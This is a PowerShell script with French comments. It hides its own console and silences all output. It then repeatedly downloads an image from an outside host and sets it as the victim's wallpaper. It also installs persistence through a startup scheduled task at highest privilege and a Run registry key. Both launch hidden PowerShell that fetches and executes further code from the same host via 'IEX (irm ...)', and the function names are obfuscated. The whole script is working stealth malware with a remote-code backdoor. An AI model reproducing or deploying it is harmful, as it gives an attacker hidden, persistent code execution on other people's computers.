$WinStyle = @" using System; using System.Runtime.InteropServices; public class WindowHider { [DllImport("kernel32.dll")] static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); public static void Hide() { var handle = GetConsoleWindow(); ShowWindow(handle, 0); } } "@ Add-Type $WinStyle [WindowHider]::Hide() # Désactive complètement toute sortie console $null = New-Item -Path "function:Write-Host" -Value { param([string]$Message) } -Force $null = New-Item -Path "function:Write-Output" -Value { param([string]$Message) } -Force $null = New-Item -Path "function:Write-Error" -Value { param([string]$Message) } -Force $null = New-Item -Path "function:Write-Warning" -Value { param([string]$Message) } -Force $null = New-Item -Path "function:Write-Verbose" -Value { param([string]$Message) } -Force $null = New-Item -Path "function:Write-Debug" -Value { param([string]$Message) } -Force # Redirige toutes les sorties vers $null $ErrorActionPreference = "SilentlyContinue" $ProgressPreference = "SilentlyContinue" $VerbosePreference = "SilentlyContinue" $DebugPreference = "SilentlyContinue" $InformationPreference = "SilentlyContinue" # ── Config ──────────────────────────────────────────────────────────────────── $Url = "http://x.celian-vf.fr/tchoupi.jpg" $Style = 10 $Interval = 1 $TaskName = "WallpaperPersist" $RegRunPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" $RegRunName = "WallpaperPersist" $ScriptUrl = "http://x.celian-vf.fr/0.php" $PersistCmd = "powershell -NoP -NonI -W Hidden -Exec Bypass `"IEX (irm '$ScriptUrl')`"" # ── Helpers ─────────────────────────────────────────────────────────────────── function Set-SecretProcedure8021 { param([int]$Style) $regPath = "HKCU:\Control Panel\Desktop" $tile = if ($Style -eq 1) { "1" } else { "0" } Set-ItemProperty -Path $regPath -Name WallpaperStyle -Value $Style Set-ItemProperty -Path $regPath -Name TileWallpaper -Value $tile } function Invoke-SecretWorker1797 { param([string]$Path) if (-not ("WallpaperAPI" -as [type])) { Add-Type @" using System; using System.Runtime.InteropServices; public class WallpaperAPI { [DllImport("user32.dll", CharSet = CharSet.Auto)] public static extern int SystemParametersInfo( int uAction, int uParam, string lpvParam, int fuWinIni); } "@ } [WallpaperAPI]::SystemParametersInfo(0x0014, 0, $Path, 0x01 -bor 0x02) | Out-Null } function PrivateEvent6170 { $ext = [IO.Path]::GetExtension($Url.Split('?')[0]) $destPath = Join-Path $env:TEMP "wallpaper$ext" $webClient = New-Object System.Net.WebClient $webClient.DownloadFile($Url, $destPath) $bytes = [IO.File]::ReadAllBytes($destPath) $isImage = ($bytes[0] -eq 0xFF -and $bytes[1] -eq 0xD8) -or ($bytes[0] -eq 0x89 -and $bytes[1] -eq 0x50) -or ($bytes[0] -eq 0x47 -and $bytes[1] -eq 0x49) -or ($bytes[0] -eq 0x42 -and $bytes[1] -eq 0x4D) if (-not $isImage) { throw "Not a valid image." } Set-SecretProcedure8021 -Style $Style Invoke-SecretWorker1797 -Path $destPath } function StealthSignal4702 { try { $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoP -NonI -W Hidden -Exec Bypass `"IEX (irm '$ScriptUrl')`"" $trigger = New-ScheduledTaskTrigger -AtStartup $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger ` -Settings $settings -RunLevel Highest -Force | Out-Null } catch { } Set-ItemProperty -Path $RegRunPath -Name $RegRunName -Value $PersistCmd } function Test-RunningExecutor1448 { $hasReg = Get-ItemProperty -Path $RegRunPath -Name $RegRunName -ErrorAction SilentlyContinue $hasTask = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue return ($hasReg -or $hasTask) } # ── Main ────────────────────────────────────────────────────────────────────── if (-not (Test-RunningExecutor1448)) { StealthSignal4702 } while ($true) { try { PrivateEvent6170 } catch { } Start-Sleep -Seconds ($Interval * 60) }